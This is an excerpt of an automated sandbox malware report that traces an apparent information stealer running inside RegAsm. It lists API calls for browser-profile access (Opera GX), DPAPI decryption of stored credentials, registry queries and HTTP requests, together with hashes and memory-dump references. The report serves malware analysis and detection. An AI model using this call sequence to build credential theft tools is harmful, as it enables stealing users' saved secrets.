                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: f7fddd48446b66624f989ddf55f757fe03e7b97f552272bf7b28bd8c8e1d3731
                                                                                                                                                                                                                                                                                                  • Instruction ID: 30e341699e2e63c723fbf29d5a2f39e223cda5f639fb32d69e3c15c830b377e5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7fddd48446b66624f989ddf55f757fe03e7b97f552272bf7b28bd8c8e1d3731
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5721FB317016146BDB355E65DD8CBAE7279AF46708F50092AF90397741E7206840C7F1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(00427AB4,00000000,00000001,00427260,?,00000001,00000001,?,00000000,?,Windows: ,00000000,?,004273F4,00000000,?), ref: 00410F8D
                                                                                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00410F9C
                                                                                                                                                                                                                                                                                                  • _wtoi64.MSVCRT ref: 00410FE2
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00410FF8
                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00410FFB
Memory Dump Source
• Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1817501562-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: 0l@$0l@$0l@
                                                                                                                                                                                                                                                                                                  • API String ID: 0-278002525
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411450: GetSystemTime.KERNEL32(?,0156F048,00427270,?,00000000,00000008,?,?,00000000,00421AA1,000000FF,?,0040460E,0041FDC9,00000014), ref: 004114A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00426AAA,00000009), ref: 0040A227
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040A40B
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040A41F
                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A4A1
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 211194620-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,01571F98,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F77
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: LocalAlloc.KERNEL32(00000040,00000000,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F86
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: LocalFree.KERNEL32(?,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406FAC
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406FD0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FF5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406FD0: LocalAlloc.KERNEL32(00000040,?,?), ref: 0040700D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406FD0: LocalFree.KERNEL32(?), ref: 0040702E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                                                                  • String ID: $DPAPI
                                                                                                                                                                                                                                                                                                  • API String ID: 512175977-1819349886
                                                                                                                                                                                                                                                                                                  • Opcode ID: e57edee3f3d7b817aeb0e109a879f4908534b96d8f8cc706ab0346b101acb06e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 756776268f3a410f8ea97ed2d03368a249db7ca66dc35e5b071a325b4266dc37
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e57edee3f3d7b817aeb0e109a879f4908534b96d8f8cc706ab0346b101acb06e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D431B4B1D00109ABDB10DB95DC42BEFB77AEB44314F14462AF905B32D1E738A90587E6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104E5
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004104EC
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,0156B410,00000000,00020119,00000000), ref: 0041050B
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,01571D80,00000000,00000000,00000000,000000FF), ref: 00410526
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3676486918-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                                                                  • Instruction ID: 676a6382b8ff66aaa777a0d0020f05f931ed1f937911e77e191903498250bf3d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e6d39d117e0467e1ea244c9ca8b316610d55b9159fd229541649f6d9304fad4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92F04FB9640218FFE710DBA0EC49FAB7B7EEB49B01F005159FB0597240D6705900CBA0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040CDE0: StrStrA.SHLWAPI(00000000,01571F98,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040CDE0: memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                                                                  • String ID: $$Opera GX
                                                                                                                                                                                                                                                                                                  • API String ID: 1439182418-3699434461
                                                                                                                                                                                                                                                                                                  • Opcode ID: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 80cc4b7ed22ef5f98a5cc857f1ea2cbded4609870464dcecd3af56b3405bc9c8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd309a3b40900918eb7f523b4228bde185d93eea0c4cc0c3a7b4a9c3baf3580c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68128070901248EACB14EBE5D945ADDBBB9AF19304F14817EE905732D2DB782B0CC7A6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748), ref: 0040ECE0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708), ref: 0040EDE3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040E2F0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Stable\
                                                                                                                                                                                                                                                                                                  • API String ID: 3722407311-272486606
                                                                                                                                                                                                                                                                                                  • Opcode ID: da73e72bf46c9c8938a123d0de55fbd3436eada3c5d5d954846008cbdd8a4f45
                                                                                                                                                                                                                                                                                                  • Instruction ID: 269e7effacccc3b88f2b0db5f774b9eadeb94123610fb6cb7fcf78a80ad87f18
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da73e72bf46c9c8938a123d0de55fbd3436eada3c5d5d954846008cbdd8a4f45
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CB13774900248DFCB24DFA9C581ADEBBF5BF48304F10856EE946A3791D774AA08CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00413E40
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F0F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-2861137601
                                                                                                                                                                                                                                                                                                  • Opcode ID: 875d17d054caf0032805d24f7412f369e5d2c0d1644f1f1309d22229dc259743
                                                                                                                                                                                                                                                                                                  • Instruction ID: d06a122d75f069d58e7f74fa6f005182342bd9d38848a2deb67c20992f7cfd55
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 875d17d054caf0032805d24f7412f369e5d2c0d1644f1f1309d22229dc259743
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4141B7B1D00248AFCB00EFB9D946BDD7B74EB09744F10816EF51567281DB389648C7E5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: HttpOpenRequestA.WININET(00000000,GET,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413AB5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 1815705353-2579291623
                                                                                                                                                                                                                                                                                                  • Opcode ID: 29369b383e77385b3c5e2df5f409f7e149f79e40e97b6244fb7927c41833eb8e
                                                                                                                                                                                                                                                                                                  • Instruction ID: ea8fe1bea799831a1bfffcb10daa165b53663d9ec20256ad752a871f992b9cff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29369b383e77385b3c5e2df5f409f7e149f79e40e97b6244fb7927c41833eb8e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08315274904248DADB10EBA5C5067DD7BB8AF15308F5041AEE905636D3DBBC2B08CBE6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C7F3095
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C87F688,00001000), ref: 6C7F35D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7F35E0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7F35FD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7F363F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7F369F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: __aulldiv.LIBCMT ref: 6C7F36E4
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7F309F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8156EE,?,00000001), ref: 6C815B85
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: EnterCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815B90
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: LeaveCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815BD8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: GetTickCount64.KERNEL32 ref: 6C815BE4
                                                                                                                                                                                                                                                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7F30BE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C7F3127
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F30F0: __aulldiv.LIBCMT ref: 6C7F3140
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB2A: __onexit.LIBCMT ref: 6C82AB30
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1484a2a87a11838f89d7edb7ccd5e04918b401f17c18668e552b136a7de395f0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a16f77e82b0a0c4cbb1b6a0c0530000cc0db25f29815486b7d4f2afd43dbc30
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1484a2a87a11838f89d7edb7ccd5e04918b401f17c18668e552b136a7de395f0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAF0D622D2075496CB31EF7989891EA73B0AF7B218F50573AE85953611FB2066D8C3E2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004119DC
                                                                                                                                                                                                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004119F7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004119FE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bcc58d43892302e84752d8720c11c2692e214fff34667dd5a0482a2640b4e2d4
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac0064d5e055494f77bdf6553da814fcfcb78952508ca86c52a6e4941c22f22a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcc58d43892302e84752d8720c11c2692e214fff34667dd5a0482a2640b4e2d4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4F02735A0523867E720AB84DC05FDE77289F05710F000094FF84AB2D0DBB05E8487D4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01562ED0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01562ED0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01562ED0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01562ED0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 0041022C
